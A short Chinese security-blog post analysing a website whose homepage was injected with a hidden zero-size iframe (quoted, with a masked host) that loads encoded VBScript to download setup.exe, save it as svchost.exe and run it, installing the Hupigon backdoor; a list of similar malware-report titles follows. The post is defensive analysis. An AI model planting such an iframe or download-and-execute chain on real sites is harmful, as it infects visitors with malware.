一个下载灰鸽子Backdoor.Win32.Hupigon.cge的网站

简介: 一个下载灰鸽子Backdoor.Win32.Hupigon.cge的网站

该网站首页首部被加入代码:

/-----------
<IFRAME src="hxxp://58***000.128**.to***for.com/x***skj.htm width=0 height=0></IFRAME>
-----------/

x***skj.htm  的内容为escape()加密的VBScript代码,功能为:利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 setup.exe,保存为 %temp%/svchost.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。

setup.exe 文件大小为301 KB (308,224 字节),Kaspersky 报为 Backdoor.Win32.Hupigon.cge。  


相关文章
|
2月前
|
安全 数据安全/隐私保护
01-12/某县政府网被加入下载木马 Trojan.Win32.Pakes 的代码(第2版)
01-12/某县政府网被加入下载木马 Trojan.Win32.Pakes 的代码(第2版)
|
2月前
|
安全
某可人官方网站挂马Trojan-PSW.Win32.OnLineGames.sbg
某可人官方网站挂马Trojan-PSW.Win32.OnLineGames.sbg
|
2月前
|
安全 JavaScript 前端开发
某政府网站被挂木马txet.exe/Trojan-PSW.Win32.QQRob.iy
某政府网站被挂木马txet.exe/Trojan-PSW.Win32.QQRob.iy
|
2月前
|
开发框架 Java .NET
某论坛被加入下载灰鸽子Backdoor.Gpigeon.2006.bbe等恶意程序的代码
某论坛被加入下载灰鸽子Backdoor.Gpigeon.2006.bbe等恶意程序的代码
|
2月前
|
安全 JavaScript 前端开发
[07-28] 一个下载灰鸽子Backdoor.Gpigeon.2006等病毒的网站(第2版)
[07-28] 一个下载灰鸽子Backdoor.Gpigeon.2006等病毒的网站(第2版)
|
存储 JSON 安全
phpStudy 小皮 Windows面板 RCE漏洞
详情看文章内叙述
272 1
|
6月前
|
安全 Shell
2021Kali -- 木马免杀制作
2021Kali -- 木马免杀制作
97 1
|
Web App开发
软件 | IDM网页嗅探器
我们在网页上面看到很多视频,想下载下来,但是苦于找不到下载的地方或者下载需要付费订阅等,那么有这么一个软件,国外的,可以支持正版,也可以用这个版本。
126 0
软件 | IDM网页嗅探器
|
安全 机器人 Shell
【靶机】Windows渗透初体验-Steel Mountain
本靶机是windows版的mr robot,难度适中,值得一做。
224 0
CobaltStrike4.2-下载
CobaltStrike4.2-下载
下一篇
无影云桌面